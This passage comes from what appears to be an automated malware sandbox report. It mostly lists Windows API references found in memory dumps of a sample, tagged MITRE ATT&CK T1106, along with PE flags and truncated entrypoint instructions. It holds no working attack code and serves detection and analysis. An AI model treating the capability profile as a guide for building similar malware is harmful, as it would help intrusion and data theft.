reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcmpiA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateThread\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetLogicalDriveStringsA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetDriveTypeA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetWindowsDirectoryA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"MoveFileA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"EnumResourceNamesA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetSystemInfo\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetVersionExA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetThreadPriority\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCurrentThread\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"FreeResource\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"UpdateResourceA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SizeofResource\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"LockResource\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"LoadResource\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"FindResourceA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"EnumResourceLanguagesA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"EndUpdateResourceA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"BeginUpdateResourceA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateMutexA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetVolumeInformationA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetComputerNameA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"OpenMutexA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetPriorityClass\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetTempPathA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetSystemDirectoryA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetErrorMode\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"InitializeCriticalSection\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapAlloc\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetProcessHeap\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapFree\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"ExitThread\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetTimeFormatA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetDateFormatA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetFileSize\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GlobalUnlock\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GlobalLock\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GlobalAlloc\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetFileTime\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SystemTimeToFileTime\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetSystemTime\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateDirectoryA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateProcessA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"wsprintfA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetWindowRect\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetDesktopWindow\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"ShowWindow\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"EnableWindow\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetClassNameA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"DestroyWindow\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetWindowPos\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"PostMessageA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetWindowThreadProcessId\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetWindowTextA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"IsWindowVisible\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"EnumWindows\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"IsWindowEnabled\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"LookupIconIdFromDirectoryEx\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCursorPos\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetCursorPos\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetSystemMetrics\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"ReleaseDC\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetWindowDC\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetClipboardData\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"EmptyClipboard\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SendInput\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetFocus\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetForegroundWindow\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetWindowTextA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"EnumChildWindows\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetWindowPlacement\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetWindow\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetClientRect\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"PostQuitMessage\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"DispatchMessageA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"TranslateMessage\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetMessageA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"UpdateWindow\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"RegisterClassA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"UnregisterClassA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SendMessageTimeoutA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"RegisterWindowMessageA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetDIBits\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"DeleteDC\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"BitBlt\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SelectObject\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateCompatibleBitmap\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateCompatibleDC\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"DeleteObject\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetUserNameA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"ChangeServiceConfigA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetSecurityDescriptorSacl\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetSecurityDescriptorGroup\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetSecurityDescriptorOwner\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetSecurityDescriptorDacl\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"InitializeSecurityDescriptor\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"AddAccessAllowedAce\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"InitializeAcl\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetLengthSid\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetTokenInformation\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetFileSecurityA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"ShellExecuteA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SHGetMalloc\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SHGetPathFromIDListA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SHGetSpecialFolderLocation\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"VerQueryValueA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetFileVersionInfoA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetFileVersionInfoSizeA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"RpcStringFreeA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"UuidToStringA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"UuidCreate\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"RtlUnwind\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"InterlockedExchange\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"VirtualQuery\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"LCMapStringA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"LCMapStringW\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetACP\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetOEMCP\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCPInfo\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"VirtualProtect\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"VirtualAlloc\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetStdHandle\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsW\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentStringsW\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetHandleCount\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetFileType\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapDestroy\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapCreate\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"VirtualFree\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeW\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetExitCodeProcess\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetLocaleInfoA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapReAlloc\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetStdHandle\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapSize\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CompareStringA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"CompareStringW\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetEnvironmentVariableA\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"FlushFileBuffers\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetProcessWindowStation\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetUserObjectInformationA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetLastActivePopup\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetActiveWindow\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"MessageBoxA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"WriteFile\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateFileA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrlenA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetLastError\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateMutexA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"OpenMutexA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetComputerNameA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"FreeLibrary\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetTempPathA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcpynA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcatA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCurrentDirectoryA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetErrorMode\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"Process32Next\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"lstrcpyA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"Process32First\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"ShellExecuteA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"ExitProcess\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCommandLineA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetVersionExA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"QueryPerformanceCounter\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetTickCount\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCurrentThreadId\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcessId\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetSystemTimeAsFileTime\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetStdHandle\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"UnhandledExceptionFilter\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"FreeEnvironmentStringsW\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetEnvironmentStringsW\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetHandleCount\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetFileType\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapDestroy\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapCreate\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"VirtualFree\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapFree\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"RtlUnwind\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"InterlockedExchange\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"VirtualQuery\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetACP\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetOEMCP\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCPInfo\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapAlloc\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"VirtualAlloc\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapReAlloc\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"HeapSize\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"LCMapStringA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"LCMapStringW\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetStringTypeW\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetLocaleInfoA\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"VirtualProtect\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetSystemInfo\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"gegdsimsogm.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\" file has an entrypoint instructions - \"push\t0x60,push\t0x407170,call\t0x402bf0,mov\tedi, 0x94,mov\teax, edi,call\t0x403900,mov\tdword ptr [ebp - 0x18], esp,mov\tesi, 